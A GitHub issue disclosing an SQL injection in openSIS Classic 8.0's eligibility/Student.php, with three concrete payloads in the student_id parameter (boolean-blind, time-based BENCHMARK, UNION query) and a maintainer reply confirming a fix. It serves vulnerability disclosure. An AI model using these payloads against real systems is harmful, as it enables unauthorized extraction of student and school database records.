Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL Injection in /modules/eligibility/Student.php #248

Closed
zerrr0 opened this issue Mar 7, 2022 · 1 comment
Closed

SQL Injection in /modules/eligibility/Student.php #248

zerrr0 opened this issue Mar 7, 2022 · 1 comment

Comments

@zerrr0
Copy link

zerrr0 commented Mar 7, 2022

Due to lack of protection, parameter student_id in /modules/eligibility/Student.php can be abused to injection SQL queries to extract information from databases.

POC:

Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: /openSIS-Classic-8.0/Ajax.php?modname=eligibility/Student.php&student_id=(SELECT (CASE WHEN (5146=5146) THEN 15 ELSE (SELECT 5608 UNION SELECT 5507) END))&ajax=true

Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: /openSIS-Classic-8.0/Ajax.php?modname=eligibility/Student.php&student_id=15 AND 2719=BENCHMARK(5000000,MD5(0x5246526f))&ajax=true

Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: /openSIS-Classic-8.0/Ajax.php?modname=eligibility/Student.php&student_id=15 UNION ALL SELECT NULL,NULL,CONCAT(0x716b706271,0x6b67466d72447a6e53786a6d4c527a71657250527871584356544f484c4a417a494c48637847576d,0x7170786b71),NULL,NULL-- -&ajax=true

PIC
Traceback:
openSIS-Classic-8.0/modules/eligibility/Student.php
Solution:
Use function sqlSecurityFilter() before assign $_REQUEST['student_id'] into query "SELECT".
PIC

sarika0lal added a commit that referenced this issue Mar 31, 2022
sarika0lal added a commit that referenced this issue Mar 31, 2022
@sarika0lal
Copy link
Contributor

Hello,

We appreciate your observation and would like to inform that your suggestion has been implemented. Please check and let us know your feedback in case you have any.

Thank you.

sarika0lal added a commit that referenced this issue Mar 31, 2022
sarika0lal added a commit that referenced this issue Mar 31, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants